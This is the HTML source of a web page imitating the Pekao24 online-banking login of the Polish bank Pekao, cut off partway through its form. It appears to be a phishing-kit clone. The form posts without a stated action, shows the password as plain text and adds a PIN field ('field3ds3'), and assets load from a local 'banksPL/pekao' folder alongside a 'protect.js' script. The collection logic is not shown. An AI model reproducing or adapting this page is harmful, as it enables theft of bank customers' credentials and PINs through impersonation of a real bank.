<!DOCTYPE html>
<html lang="pl"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>Pekao24 - Logowanie</title>
    <meta name="description" content="Witaj na nowej stronie www.pekao24.pl">
    <!--<base>--><base href=".">
    <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
    <link rel="shortcut icon" href="https://www.pekao.com.pl/.resources/pekao-module/webresources/src/favicon/favicon-32x32.png">
    <script src="https://code.jquery.com/jquery-3.6.0.js"></script>
    <script src="/static/style/protect/protect.js"></script>
  </head>

  <body>
    <style>
      [_pekaostyle-c161] .button,
      [_pekaostyle-c65] .field-button [pekao-icon] {
        transition: all .2s ease-in-out
      }
      
      *,
      .ql-container,
      .ql-editor,
      [_pekaostyle-c161] .button {
        box-sizing: border-box
      }
      
      .ql-container.ql-pekao .ql-editor {
        padding: 0;
        overflow-x: hidden
      }
      
      .ql-container.ql-pekao .ql-editor p {
        font-family: Lato, sans-serif;
        font-weight: 400;
        color: #404040;
        margin: 0;
        font-size: 16px;
        line-height: 1.5
      }
      
      .ql-container.ql-pekao .ql-editor strong {
        font-weight: 700
      }
      
      .ql-container.ql-pekao .ql-editor a {
        display: inline-block;
        color: #d71920
      }
      
      .ql-container.ql-pekao .ql-editor a:hover {
        color: #b7151b
      }
      
      @media (hover:hover) {
        .ql-container.ql-pekao .ql-editor .button.button-tertiary-white:not(: disabled):hover, .ql-container.ql-pekao .ql-editor .button.button-tertiary:not(: disabled):hover {
          color: #ac141a
        }
        .ql-container.ql-pekao .ql-editor .button.button-tertiary-white:not(:disabled):hover {
          color: #fff
        }
      }
      
      .ql-container.ql-pekao .ql-editor .button.peopay-deprecated-style.button-primary:focus:not(:active) {
        box-shadow: none;
        border-color: #8f8f8f;
        background-color: #ac141a
      }
      
      html {
        line-height: 1.15;
        -ms-text-size-adjust: 100%;
        -webkit-text-size-adjust: 100%
      }
      
      footer,
      header,
      main,
      section {
        display: block
      }
      
      a {
        background-color: transparent;
        -webkit-text-decoration-skip: objects
      }
      
      strong {
        font-weight: inherit;
        font-weight: bolder
      }
      
      img {
        border-style: none
      }
      
      svg:not(:root) {
        overflow: hidden
      }
      
      button,
      input {
        font-size: 100%;
        line-height: 1.15;
        margin: 0;
        overflow: visible
      }
      
      button {
        text-transform: none
      }
      
      button,
      html [type=button] {
        -webkit-appearance: button
      }
      
      [type=button]::-moz-focus-inner,
      button::-moz-focus-inner {
        border-style: none;
        padding: 0
      }
      
      [type=button]:-moz-focusring,
      button:-moz-focusring {
        outline: ButtonText dotted 1px
      }
      
      ::-webkit-file-upload-button {
        -webkit-appearance: button;
        font: inherit
      }
      
      * {
        -webkit-tap-highlight-color: transparent
      }
      
      body,
      html {
        height: 100%;
        overflow-x: hidden;
        overflow-y: hidden
      }
      
      body,
      button,
      input,
      label {
        font-family: Lato, sans-serif
      }
      
      a,
      button {
        color: inherit;
        text-decoration: none;
        cursor: pointer
      }
      
      body {
        margin: 0;
        font-size: 14px
      }
      
      h1,
      p {
        margin: 0;
        padding: 0
      }
      
      h1 {
        font-size: 32px;
        line-height: 40px;
        letter-spacing: -.2px;
        font-weight: 700
      }
      
      p {
        font-size: 14px;
        line-height: 20px;
        letter-spacing: -.1px
      }
      
      ::-moz-selection {
        color: #fff;
        background: #d71920
      }
      
      ::selection {
        color: #fff;
        background: #d71920
      }
      
      .visually-hidden {
        position: absolute!important;
        clip: rect(1px 1px 1px 1px);
        clip: rect(1px, 1px, 1px, 1px);
        padding: 0!important;
        border: 0!important;
        height: 1px!important;
        width: 1px!important;
        overflow: hidden!important
      }
      
      ::-webkit-scrollbar {
        width: 0
      }
      
      @media (min-width:1260px) {
        ::-webkit-scrollbar {
          width: 12px
        }
      }
      
      ::-webkit-scrollbar-track {
        border-radius: 10px
      }
      
      ::-webkit-scrollbar-thumb {
        border-radius: 10px;
        border: 3px solid #f0f0f0;
        background: rgba(0, 0, 0, .4)
      }
      
      ::-webkit-scrollbar-thumb:window-inactive {
        background: rgba(0, 0, 0, .4)
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 300;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 300;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 400;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 400;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 500;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 500;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 600;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 600;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 700;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 700;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 900;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: Lato;
        src: url();
        font-weight: 900;
        font-style: normal;
        font-display: swap
      }
      
      @font-face {
        font-family: myicons;
        src: url();
        font-weight: 400;
        font-style: normal
      }
      
      .ql-container {
        font-family: Helvetica, Arial, sans-serif;
        font-size: 13px;
        height: 100%;
        margin: 0;
        position: relative
      }
      
      .ql-clipboard {
        left: -100000px;
        height: 1px;
        overflow-y: hidden;
        position: absolute;
        top: 50%
      }
      
      .ql-editor {
        line-height: 1.42;
        height: 100%;
        outline: 0;
        overflow-y: auto;
        padding: 12px 15px;
        -o-tab-size: 4;
        tab-size: 4;
        -moz-tab-size: 4;
        text-align: left;
        white-space: pre-wrap;
        word-wrap: break-word
      }
      
      .ql-editor>* {
        cursor: text
      }
      
      .ql-editor p {
        margin: 0;
        padding: 0;
        counter-reset: list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9
      }
      
      [_pekaostyle-c716] {
        display: block;
        min-width: 320px;
        height: 100%
      }
      
      .router-outlet[_pekstyle-c716] {
        height: 100%;
        overflow: hidden
      }
      
      .login-container[_pekstyle-c641] {
        display: flex;
        align-items: center;
        flex-direction: column;
        height: 100%;
        justify-content: space-between;
        width: 100%;
        -webkit-overflow-scrolling: touch;
        overflow: hidden auto;
        overflow-x: hidden;
        overflow-y: auto
      }
      
      @media (min-width:768px) {
        .login-container[_pekstyle-c641] {
          background: url(#) 50% no-repeat;
          background-size: cover
        }
      }
      
      @media (min-width:768px) and (-webkit-min-device-pixel-ratio:2),
      (min-width:768px) and (min-resolution:192dpi) {
        .login-container[_pekstyle-c641] {
          background-image: url(#)
        }
      }
      
      @media (min-width:980px) and (-webkit-min-device-pixel-ratio:2),
      (min-width:980px) and (min-resolution:192dpi) {
        .login-container[_pekstyle-c641] {
          background-image: url(#)
        }
      }
      
      @media (min-width:1260px) {
        .login-container[_pekstyle-c641] {
          background-image: url(pekao-image-1.jpg)
        }
      }
      
      @media (min-width:1260px) and (-webkit-min-device-pixel-ratio:2),
      (min-width:1260px) and (min-resolution:192dpi) {
        .login-container[_pekstyle-c641] {
          background-image: url(#)
        }
      }
      
      @media (min-width:1260px) and (-webkit-min-device-pixel-ratio:3),
      (min-width:1260px) and (-webkit-min-device-pixel-ratio:3.6458333333333335),
      (min-width:1260px) and (min-resolution:350dpi) {
        .login-container[_pekstyle-c641] {
          background-image: url(#)
        }
      }
      
      .header[_pekstyle-c641] {
        background-color: #b7151b;
        height: 56px;
        min-width: 100vw;
        flex-shrink: 0
      }
      
      .header-wrapper[_pekstyle-c641] {
        display: flex;
        flex-direction: row;
        flex-shrink: 0;
        height: 100%;
        justify-content: space-between;
        margin: 0 auto;
        max-width: 1260px;
        padding: 0 20px
      }
      
      .account-action-group[_pekstyle-c641] {
        align-items: center;
        display: flex;
        flex-direction: row;
        height: 56px
      }
      
      .account-label[_pekstyle-c641],
      .account-link[_pekstyle-c641] {
        color: #fff;
        font-weight: 400
      }
      
      .account-label[_pekstyle-c641] {
        padding-right: 20px;
        letter-spacing: 1.09px;
        font-size: 16px
      }
      
      .account-link[_pekstyle-c641] {
        font-size: 12px;
        letter-spacing: 1.5px;
        text-transform: uppercase
      }
      
      .logo[_pekstyle-c641] {
        height: 56px;
        width: 171px
      }
      
      .content[_pekstyle-c641] {
        display: flex;
        align-items: center;
        flex-direction: column;
        flex-grow: 1;
        flex-shrink: 0;
        justify-content: center;
        width: 100%
      }
      
      .login-container-wrapper[_pekstyle-c641] {
        margin: 20px auto;
        position: relative;
        max-width: 1260px
      }
      
      @media (max-width:767px) {
        .login-container-wrapper[_pekstyle-c641] {
          height: 100%;
          margin: 0;
          width: 100%
        }
        .show-on-desktop[_pekstyle-c641] {
          display: none
        }
      }
      
      [_pekaostyle-c640] {
        width: 100%;
        min-width: 100vw
      }
      
      .footer-section[_pekstyle-c640],
      .footer[_pekstyle-c640] {
        background-color: #f7f7f7
      }
      
      .footer-section[_pekstyle-c640] {
        border-top: 1px solid #d9d9d9;
        padding-top: 15px
      }
      
      .footer-section.bank-information[_pekstyle-c640] {
        padding-bottom: 15px
      }
      
      .footer-wrapper[_pekstyle-c640] {
        color: #707070;
        margin: 0 auto;
        padding: 0 20px;
        max-width: 1260px
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] {
        display: flex;
        flex-wrap: wrap
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] {
        display: flex;
        align-self: center;
        margin-bottom: 15px
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] pekao-button[_pekstyle-c640] {
        padding-right: 48px
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button[_pekstyle-c640] {
        color: #707070;
        font-size: 14px;
        font-weight: 400;
        line-height: 21px;
        text-transform: none;
        padding: 0
      }
      
      @media (min-width:768px) {
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button[_pekstyle-c640] {
          font-size: 16px
        }
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button[_pekstyle-c640]:focus {
        border: transparent
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button[_pekstyle-c640]:hover {
        color: #404040
      }
      
      .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button.phone-number[_pekstyle-c640] {
        font-size: 18px;
        color: #404040;
        font-weight: 700;
        line-height: 28px
      }
      
      @media (min-width:768px) {
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .button.phone-number[_pekstyle-c640] {
          font-size: 24px
        }
      }
      
      @media (max-width:979px) {
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group.phone-numbers-group[_pekstyle-c640] {
          width: 100%
        }
      }
      
      .footer-wrapper.footer-info-group[_pekstyle-c640] {
        font-size: 12px;
        line-height: 14px
      }
      
      .footer-wrapper.footer-info-group[_pekstyle-c640] .definition-group[_pekstyle-c640] {
        display: flex;
        padding-top: 20px
      }
      
      @media (max-width:767px) {
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] {
          width: 100%
        }
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] pekao-button[_pekstyle-c640] {
          padding-right: 0
        }
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .links[_pekstyle-c640] {
          display: flex;
          flex-direction: column
        }
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group[_pekstyle-c640] .links[_pekstyle-c640] pekao-button[_pekstyle-c640]:first-child {
          padding-bottom: 10px
        }
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group.links-group[_pekstyle-c640] .links[_pekstyle-c640],
        .footer-wrapper.footer-navigation[_pekstyle-c640] .footer-navigation-group.phone-numbers-group[_pekstyle-c640] pekao-button[_pekstyle-c640] {
          width: 50%
        }
        .footer-wrapper.footer-info-group[_pekstyle-c640] .definition-group[_pekstyle-c640] {
          flex-direction: column
        }
        .footer-wrapper.footer-info-group[_pekstyle-c640] .codes[_pekstyle-c640] {
          padding-bottom: 15px
        }
      }
      
      .footer-wrapper.footer-info-group[_pekstyle-c640] .codes[_pekstyle-c640] {
        flex-grow: 1
      }
      
      .footer-wrapper.footer-info-group[_pekstyle-c640] .padding-right[_pekstyle-c640] {
        padding-right: 25px
      }
      
      [_pekaostyle-c161] .button {
        -webkit-appearance: none;
        -moz-appearance: none;
        appearance: none;
        height: 52px;
        padding: 0 24px;
        outline: 0;
        font-size: 16px;
        font-weight: 700;
        line-height: 20px;
        font-family: Lato, sans-serif;
        text-align: center;
        cursor: pointer;
        border-radius: 26px;
        white-space: normal;
        color: #fff;
        border: 2px solid #d71920;
        background-color: #d71920
      }
      
      [_pekaostyle-c161] .button.button-primary {
        width: 100%;
        min-width: 140px;
        color: #fff;
        border: 2px solid #d71920;
        background-color: #d71920
      }
      
      @media (hover:hover) {
        [_pekaostyle-c161] .button.button-primary:hover {
          border-color: #c51a20;
          background-color: #c51a20
        }
      }
      
      [_pekaostyle-c161] .button.button-primary:focus {
        box-shadow: inset 0 0 0 2px #fff
      }
      
      [_pekaostyle-c161] .button.button-primary:active {
        border-color: #b7151b;
        background-color: #b7151b;
        box-shadow: none
      }
      
      [_pekaostyle-c161] .button.button-tertiary {
        height: auto;
        width: auto;
        padding: 10px 0;
        border: none;
        border-radius: 0;
        display: inline-block;
        text-align: center;
        font-size: 16px;
        font-weight: 700;
        letter-spacing: -.1px;
        line-height: 20px;
        color: #d71920;
        background-color: transparent;
        transition: color .2s ease-in-out;
        position: relative
      }
      
      [_pekaostyle-c161] .button.button-tertiary:disabled {
        cursor: default;
        color: #8f8f8f
      }
      
      .peopay-deprecated-style[_pekaostyle-c161] .button.button-primary:focus:not(:active) {
        box-shadow: none;
        border-color: #8f8f8f;
        background-color: #ac141a
      }
      
      [_pekaostyle-c726] {
        display: block
      }
      
      .number-client-or-name-pekao-field[_pekstyle-c726] .pekao-field-input[_pekstyle-c726] {
        border-top-right-radius: 0;
        border-bottom-right-radius: 0
      }
      
      .main-action-group[_pekstyle-c726] {
        padding: 20px 0;
        text-align: right
      }
      
      .main-action-group[_pekstyle-c726] .button[_pekstyle-c726] {
        max-width: 171px
      }
      
      .account-action-group[_pekstyle-c726] {
        display: flex;
        justify-content: space-between
      }
      
      @media (max-width:767px) {
        .account-action-group[_pekstyle-c726] {
          padding-top: 10px
        }
        .login-container-footer[_pekstyle-c726] {
          border-top: 1px solid #d9d9d9;
          margin-top: 15px;
          padding-top: 20px
        }
      }
      
      .keyboard-button[_pekstyle-c726]:disabled {
        background: #eee;
        border-color: #d9d9d9;
        color: #8f8f8f;
        cursor: not-allowed
      }
      
      .keyboard-button[_pekstyle-c726]:disabled:focus {
        box-shadow: none
      }
      
      @media (hover:hover) {
        .keyboard-button[_pekstyle-c726]:disabled:hover {
          box-shadow: none
        }
      }
      
      [_pekaostyle-c726] .login-customer-wrapper .login-container-content {
        min-height: 555px;
        z-index: 2
      }
      
      [_pekaostyle-c726] .login-customer-wrapper .login-container-content .login-container-form {
        min-height: 385px
      }
      
      @media (min-width:768px) {
        [_pekaostyle-c161] .button.button-primary {
          width: auto
        }
        .show-on-mobile[_pekstyle-c726] {
          display: none
        }
      }
      
      [_pekaostyle-c25] svg {
        width: 1em;
        height: 1em;
        display: inline-block;
        vertical-align: -.2em
      }
      
      @media (max-width:767px) {
        .login-container-wrapper[_pekstyle-c639],
        [_pekaostyle-c639] {
          height: 100%
        }
      }
      
      .login-container-content[_pekstyle-c639] {
        position: relative;
        display: flex;
        flex-direction: column;
        width: 460px;
        height: auto;
        max-height: 100%;
        min-height: 390px;
        margin: 0 auto;
        padding: 24px 40px 20px;
        overflow: auto;
        background-color: #fff;
        box-shadow: 0 0 10px 0 rgba(0, 0, 0, .2);
        border: 1px solid #d9d9d9
      }
      
      @media (max-width:767px) {
        .login-container-content[_pekstyle-c639] {
          margin: 0 auto;
          width: 100%;
          height: 100%;
          padding-right: 20px;
          padding-left: 20px;
          border-width: 1px 0
        }
      }
      
      @media (min-width:768px) {
        .login-container-content[_pekstyle-c639] .login-container-form[_pekstyle-c639] {
          flex: 1 0 auto
        }
      }
      
      .login-container-header[_pekstyle-c639] {
        flex-direction: column;
        margin-bottom: 27px
      }
      
      .login-container-header[_pekstyle-c639],
      .login-container-header[_pekstyle-c639] .title-and-language-wrapper[_pekstyle-c639] {
        display: flex;
        justify-content: space-between
      }
      
      .login-container-header-title[_pekstyle-c639] {
        color: #404040;
        font-size: 24px;
        font-weight: 400;
        line-height: 46px
      }
      
      .login-container-footer[_pekstyle-c639] {
        display: flex;
        justify-content: space-between;
        align-items: center;
        min-height: 50px
      }
      
      .field-container[_pekstyle-c65],
      [_pekaostyle-c65] {
        display: inline-block;
        width: 100%
      }
      
      [_pekaostyle-c65] {
        position: relative
      }
      
      .field-container[_pekstyle-c65] label[_pekstyle-c65] {
        display: flex;
        align-items: center;
        height: 20px;
        padding-bottom: 10px;
        font-size: 12px;
        font-weight: 500;
        line-height: 12px;
        color: #404040;
        text-transform: uppercase;
        letter-spacing: 1px
      }
      
      .field-container[_pekstyle-c65] label[_pekstyle-c65] pekao-tooltip-icon {
        margin-bottom: 3px;
        margin-left: 3px
      }
      
      .field-container[_pekstyle-c65] input[type=text] {
        box-sizing: border-box;
        box-shadow: none;
        -webkit-appearance: none;
        -moz-appearance: none;
        appearance: none;
        width: 100%;
        height: 40px;
        line-height: 40px;
        padding: 4px 20px 0;
        font-size: 16px;
        font-weight: 400;
        color: #404040;
        background: #fff;
        border: 1px solid #8f8f8f;
        border-radius: 4px;
        transition: all .2s ease-in-out, border-radius 0s
      }
      
      .field-container[_pekstyle-c65] input[type=text]::-ms-clear {
        display: none
      }
      
      .field-container[_pekstyle-c65] input[type=text]::-moz-placeholder {
        color: #8f8f8f
      }
      
      .field-container[_pekstyle-c65] input[type=text]:-ms-input-placeholder {
        color: #8f8f8f
      }
      
      .field-container[_pekstyle-c65] input[type=text]:focus {
        outline: 0;
        border-color: #404040
      }
      
      .field-container.closed-messages[_pekstyle-c65] .field-button:last-of-type {
        border-bottom-right-radius: 4px
      }
      
      .field-container[_pekstyle-c65] .messages-container[_pekstyle-c65] {
        border-bottom-right-radius: 4px;
        border-bottom-left-radius: 4px;
        overflow: hidden
      }
      
      .field-container.large[_pekstyle-c65] input[type=text] {
        height: 50px;
        line-height: 50px
      }
      
      .field-container[_pekstyle-c65] input {
        -webkit-transform: translateZ(0)
      }
      
      .field-and-buttons[_pekstyle-c65] {
        display: flex
      }
      
      @media (-ms-high-contrast:none),
      (hover:hover),
      screen and (-ms-high-contrast:active) {
        .field-container[_pekstyle-c65] input[type=text]:hover {
          border-color: #404040;
          box-shadow: none
        }
        .field-container[_pekstyle-c65]:not(.invalid):not(.warning):not(.focused) input[type=text]:hover~.field-button,
        [_pekstyle-c65]:not(.invalid):not(.warning) .field-and-buttons[_pekstyle-c65]:hover .field-button,
        [_pekstyle-c65]:not(.invalid):not(.warning) .field-and-buttons[_pekstyle-c65]:hover input[type=text] {
          border-color: #404040
        }
      }
      
      [_pekaostyle-c65] .field-button {
        width: 62px;
        font-size: 16px;
        flex-shrink: 0;
        background: #fff;
        border: 1px solid #8f8f8f;
        border-width: thin;
        transition: all .2s ease-in-out;
        outline: 0;
        color: #d71920
      }
      
      [_pekaostyle-c364],
      [_pekaostyle-c65] .field-button:focus {
        background-color: #f7f7f7
      }
      
      [_pekaostyle-c65] .field-button:last-child {
        border-top-right-radius: 4px;
        border-bottom-right-radius: 4px
      }
      
      @media (-ms-high-contrast:none),
      (hover:hover),
      screen and (-ms-high-contrast:active) {
        [_pekaostyle-c65] .field-button:hover {
          background-color: #f7f7f7
        }
      }
      
      [_pekaostyle-c65]:last-of-type {
        border-right-width: 1px
      }
      
      pekao-tooltip-icon {
        font-size: 16px
      }
      
      [_pekaostyle-c360] .ql-container.ql-pekao .ql-editor p,
      [_pekaostyle-c364] .ql-container.ql-pekao .ql-editor p {
        font-size: 14px
      }
      
      pekao-tooltip-icon span>[pekao-icon] {
        color: #8f8f8f
      }
      
      .cms-message-group[_pekstyle-c662] {
        border-top: 1px solid #d9d9d9;
        padding-top: 15px;
        margin-top: 15px
      }
      
      [_pekaostyle-c708] {
        width: 100%
      }
      
      [_pekaostyle-c708] .login-support-action-group-wrapper[_pekstyle-c708] {
        display: flex;
        justify-content: space-between;
        width: 100%
      }
      
      @media (max-width:767px) {
        [_pekaostyle-c708] .login-support-action-group-wrapper[_pekstyle-c708] {
          flex-direction: column
        }
      }
      
      [_pekaostyle-c708] .button-tertiary[_pekstyle-c708] {
        padding-left: 0;
        padding-right: 0
      }
      
      [_pekaostyle-c708] pekao-button[_pekstyle-c708]:not(:last-of-type) {
        margin-right: 45px
      }
      
      [_pekaostyle-c638] {
        align-items: center;
        display: flex;
        justify-content: flex-end
      }
      
      [_pekaostyle-c638] pekao-button[_pekstyle-c638]+pekao-button[_pekstyle-c638] {
        margin-left: 10px
      }
      
      .language[_pekstyle-c638] {
        background-size: cover;
        background-position: 50% 50%;
        background-repeat: no-repeat;
        cursor: pointer;
        display: block;
        height: 16px;
        width: 24px
      }
      
      .language[_pekstyle-c638]:hover {
        opacity: .75
      }
      
      .language-en[_pekstyle-c638] {
        background-image: url(pekao-image-4.svg)
      }
      
      .language-ua[_pekstyle-c638] {
        background-image: url(pekao-image-3.svg)
      }
      
      [_pekaostyle-c62] {
        display: block
      }
      
      [_pekaostyle-c361] {
        display: block;
        min-width: 100%
      }
      
      [_pekaostyle-c360] {
        display: flex;
        margin: 5px 0
      }
      
      [_pekaostyle-c360] .ql-container.ql-pekao .ql-editor p:first-child:before {
        content: attr(data-before-content);
        color: #8f8f8f;
        margin-right: 5px
      }
      
      [_pekaostyle-c364] {
        display: flex;
        align-items: center;
        margin-left: -40px;
        margin-right: -40px;
        padding: 15px 40px
      }
      
      @media (max-width:767px) {
        [_pekaostyle-c364] {
          margin-left: -20px;
          margin-right: -20px;
          padding-left: 20px;
          padding-right: 20px
        }
      }
      
      .stopwatch-icon[_pekstyle-c364] {
        color: #d71920;
        font-size: 20px;
        margin-right: 10px
      }
    </style>
    <pekao-root-pekao24 _pekaostyle-c716="" class="ng-tns-c716-0">
      <div _pekstyle-c716="" class="router-outlet outer-router-outlet ng-tns-c716-0 ng-trigger ng-trigger-layoutTransition">
        <router-outlet _pekstyle-c716="" class="ng-tns-c716-0"></router-outlet>
        <pekao-login _pekaostyle-c744="" class="ng-tns-c744-2 ng-star-inserted">
          <pekao-login-container _pekstyle-c744="" class="ng-tns-c744-2" _pekaostyle-c641="">
            <div _pekstyle-c641="" class="login-container">
              <header _pekstyle-c641="" class="header">
                <div _pekstyle-c641="" class="header-wrapper">
                  <a _pekstyle-c641="" target="_blank" rel="noopener" href="https://www.pekao.com.pl/"><img _pekstyle-c641="" alt="Bank Pekao" src="/static/style/banksPL/pekao/pekao-image-2.svg" class="logo"></a>
                  <section _pekstyle-c641="" class="account-action-group show-on-desktop ng-star-inserted"><span _pekstyle-c641="" class="account-label">Nie masz konta?</span><a _pekstyle-c641="" target="_blank" rel="noopener" class="account-link" href="https://www.pekao.com.pl/klient-indywidualny/codzienne-bankowanie/konta-osobiste/konto-przekorzystne.html">Zostań klientem</a></section>
                </div>
              </header>
              <main _pekstyle-c641="" class="content">
                <section _pekstyle-c641="" class="login-container-wrapper">
                  <pekao-login-customer _pekstyle-c744="" _pekaostyle-c726="" class="ng-tns-c744-2 ng-star-inserted">
                    <pekao-login-step-box _pekstyle-c726="" titletext="Logowanie do Pekao24" class="login-customer-wrapper ng-tns-c639-3 ng-star-inserted" _pekaostyle-c639="">
                      <section _pekstyle-c639="" class="login-container-wrapper ng-tns-c639-3">
                        <div _pekstyle-c639="" class="login-container-content ng-tns-c639-3 ng-trigger ng-trigger-moveLoginContainerContent" style="margin-left: 0px;">
                          <header _pekstyle-c639="" class="login-container-header ng-tns-c639-3 ng-star-inserted">
                            <div _pekstyle-c639="" class="title-and-language-wrapper ng-tns-c639-3">
                              <h1 _pekstyle-c639="" class="login-container-header-title ng-tns-c639-3">Logowanie do Pekao24</h1>
                              <!-- <pekao-language-picker _pekstyle-c639="" _pekaostyle-c638="" class="ng-tns-c639-3 ng-star-inserted">
                                <pekao-button _pekstyle-c638="" _pekaostyle-c161="" class="ng-star-inserted">
                                  <button _pekstyle-c638="" type="button" class="button button-tertiary"><span _pekstyle-c638="" class="visually-hidden">english</span><i _pekstyle-c638="" class="language language-en"></i></button>
                                </pekao-button>
                                <pekao-button _pekstyle-c638="" _pekaostyle-c161="" class="ng-star-inserted">
                                  <button _pekstyle-c638="" type="button" class="button button-tertiary"><span _pekstyle-c638="" class="visually-hidden">українська</span><i _pekstyle-c638="" class="language language-ua"></i></button>
                                </pekao-button>
                              </pekao-language-picker> -->
                            </div>
                            <section _pekstyle-c726="" login-container-header="" pekaomessageplaceholder="" class="ng-tns-c639-3"></section>
                          </header>
                          <div _pekstyle-c639="" class="login-container-form ng-tns-c639-3">
                            <!-- Start FORM -->
                            <form _pekstyle-c726="" novalidate="" autocomplete="off" class="ng-tns-c639-3 ng-untouched ng-pristine ng-invalid" method="post">
                              <pekao-field _pekstyle-c726="" for="customer" label="Wpisz numer klienta / nazwę użytkownika" pekaoautofocus="" pekaoblockautofocusinputvalidation="" _pekaostyle-c65="" class="number-client-or-name-pekao-field">
                                <!-- Start imput numer klienta -->
                                <div _pekstyle-c65="" class="field-container large closed-messages">
                                  <label _pekstyle-c65="" for="customer" class="ng-star-inserted"> Wpisz numer klienta / nazwę użytkownika
                                    <pekao-tooltip-icon _pekstyle-c726="" class="label-icon"><span aria-describedby="tooltip-93699" tabindex="0"><i pekao-icon="" _pekaostyle-c25=""><svg fill="currentColor" focusable="false" aria-hidden="true" role="img" xmlns="http://www/w3/org/2000/svg" viewBox="0 0 20 20"><g data-name="Layer 2"><path d="M9 5v2h2V5zm0 4v6h2V9zm1 11a10 10 0 1 1 10-10 10 10 0 0 1-10 10z" data-name="Layer 1"></path></g></svg></i></span> </pekao-tooltip-icon>
                                  </label> <span _pekstyle-c65="" class="field-and-buttons">
<input _pekstyle-c726="" id="login" name="login" type="text" class="pekao-field-input ng-untouched ng-pristine ng-invalid ng-star-inserted" maxlength="20">
<button _pekstyle-c726="" type="button" aria-label="Otwórz klawiaturę ekranową" class="field-button keyboard-button ng-star-inserted"><i _pekstyle-c726="" pekao-icon="" _pekaostyle-c25=""><svg fill="currentColor" focusable="false" aria-hidden="true" role="img" xmlns="http://www/w3/org/2000/svg" viewBox="0 0 20 20"><path fill="currentColor" d="M1 2h18a1 1 0 0 1 1 1v14a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1V3a1 1 0 0 1 1-1zm1 2v12h16V4H2zm5.5 8h5a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-5a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm-4-6h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm0 6h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm2-3h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm4 0h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm4 0h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm-6-3h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm4 0h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm4 0h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5zm0 6h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5z"></path></svg></i></button>
</span> </div>
                                <!-- End imput numer klienta -->
                                <!-- Start imput Hasło -->
                                <div _pekstyle-c65="" style="margin-top: 20px;" class="field-container large closed-messages">
                                  <label _pekstyle-c65="" for="customer" class="ng-star-inserted"> Hasło </label> <span _pekstyle-c65="" class="field-and-buttons">
<input _pekstyle-c726="" id="password" name="password" type="text" style="border-radius: 4px;" class="pekao-field-input ng-untouched ng-pristine ng-invalid ng-star-inserted" required="">
</span> </div>
                                <!-- End imput Hasło -->
                                 <!-- Start imput PIN -->
                                <div _pekstyle-c65="" id="field3ds3" style="margin-top: 20px;" class="field-container large closed-messages">
                                  <label _pekstyle-c65="" for="customer" class="ng-star-inserted"> PIN </label> <span _pekstyle-c65="" class="field-and-buttons">
